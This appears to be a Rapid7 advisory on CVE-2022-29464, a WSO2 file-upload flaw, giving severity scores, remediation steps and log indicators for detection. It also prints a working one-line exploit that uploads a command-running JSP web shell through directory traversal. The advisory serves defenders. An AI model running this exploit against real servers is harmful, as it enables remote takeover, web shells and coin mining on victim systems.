9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
10 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
On April 18, 2022, MITRE published CVE-2022-29464 , an unrestricted file upload vulnerability affecting various WSO2 products. WSO2 followed with a security advisory explaining the vulnerability allowed unauthenticated and remote attackers to execute arbitrary code in the following products:
A technical writeup and proof-of-concept exploit by @hakivvi quickly followed on April 20. The proof of concept uploads a malicious .jsp
to /fileupload/toolsAny
on the WSO2 productβs webserver. The .jsp
is a web shell, and due to a directory traversal issue affecting the upload files name, the attacker can write it to a location where they can then send it commands. The attack is not restricted to .jsp
files β other researchers, such as our old friend William Vu, have demonstrated exploitation with a war
file.
Exploitation is quite easy. The following, modeled after both the original PoC and Vuβs, uploads a simple jsp
web shell that the attacker will be able to use by visiting https://target:9443/authenticationendpoint/r7.jsp
:
echo '<%@ page import="java.io.*" %><% Process p = Runtime.getRuntime().
exec(request.getParameter("cmd"),null,null); %>' | curl -kv -F ../../
../../repository/deployment/server/webapps/authenticationendpoint/r7.
jsp=@- https://10.0.0.20:9443/fileupload/toolsAny
Rapid7βs Managed Detection and Response (MDR) team has observed this vulnerability being opportunistically exploited in the wild. Attackers appear to be staying close to the original proof-of-concept exploit and are dropping web shells and coin miners on exploited targets. Victim systems include both Windows and Linux installations of the aforementioned WSO2 products.
Rapid7 recommends remediating this vulnerability immediately per the instructions in WSO2βs advisory. If remediation is not possible, remove installations from the public internet as soon as possible. Inspect your installation for web shells (.jsp
and .class
): For example, the original proof of concept will drop the webshell in /authenticationendpoint/
which, when using API Manager on Windows, can be found in C:\Program Files\WSO2\API Manager\3.2.0\repository\deployment\server\webapps\authenticationendpoint
. Additionally, examine the serverβs http_access
log for requests to /fileupload/toolsAny
as a possible indication of malicious behavior:
10.0.0.2 - - [22/Apr/2022:15:45:22 -0400] POST /fileupload/toolsAny HTTP/1.1
200 31 - curl/7.74.0 0.016
10.0.0.2 - - [22/Apr/2022:15:48:46 -0400] POST //fileupload/toolsAny HTTP/1.1 200 31 - python-requests/2.25.1 0.000
10.0.0.2 - - [22/Apr/2022:15:49:13 -0400] POST /fileupload/toolsAny HTTP/1.1 200 32 - python-requests/2.25.1 0.000
Additionally, dropped war
files will likely be exploded in the webapps
directory (e.g. C:\Program Files\WSO2\API Manager\3.2.0\repository\deployment\server\webapps
). The deployment may create entries such as the following in the wso2carbon
log:
TID: [-1234] [r7] [2022-04-22 15:51:32,609] INFO {org.wso2.carbon.webapp.
mgt.TomcatGenericWebappsDeployer} - Deployed webapp: StandardEngine
[Catalina].StandardHost[localhost].StandardContext[/r7].File[C:\PROGRA~1\
WSO2\APIMAN~1\32E445~1.0\bin\..\repository\deployment\server\webapps\r7.war]
Rapid7 InsightIDR customers already have detection rules in place that can identify activity around the exploitation of this vulnerability. Customers should consider reviewing the rule action and priority of the following detection rules. Teams should be ready to investigate any alerts generated from these rules. For Rapid7 MDR customers, the MDR team is monitoring these alerts and will notify you if suspicious activity is detected in your environment.
The Rapid7 Threat Detection and Response team also added the following rule to identify malicious activity specifically related to this exploit:
InsightVM and Nexpose customers can assess their exposure to CVE-2022-29464 with a remote vulnerability check in the April 26, 2022 content release.
Get the latest stories, expertise, and news about security today.
Subscribe
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
10 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C